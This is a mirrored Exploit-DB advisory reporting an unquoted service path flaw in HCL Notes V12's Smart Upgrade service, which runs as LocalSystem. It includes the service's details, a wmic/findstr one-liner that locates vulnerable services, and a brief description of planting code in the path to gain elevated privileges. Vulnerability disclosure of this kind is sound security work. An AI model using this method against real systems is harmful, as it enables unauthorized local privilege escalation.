HCL Lotus Notes V12 – Unquoted Service Path

• Exploit Database
• 20 阅读

• 作者： Mert Daş
  日期： 2021-12-06
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50566/

• # Exploit Title: HCL Lotus Notes V12- Unquoted Service Path
  # Exploit Author: Mert DAŞ
  # Version: V12
  # Date: 01/12/2021
  # Vendor Homepage: https://www.hcltechsw.com/domino/download
  # Tested on: Windows 10
  
  
  ProcessId : 3860
  Name: LNSUSvc
  DisplayName : HCL Notes Smart Upgrade Hizmeti
  PathName: c:\HCL\Notes\SUService.exe
  StartName : LocalSystem
  StartMode : Auto
  State : Running
  
  Discovery
  -------------------------
  C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
  
  
  #Exploit:
  
  A successful attempt would require the local user to be able to insert
  their code in the system root path undetected by the OS or other security
  applications where it could potentially be executed during application
  startup or reboot. If successful, the local user's code would execute with
  the elevated privileges of the application.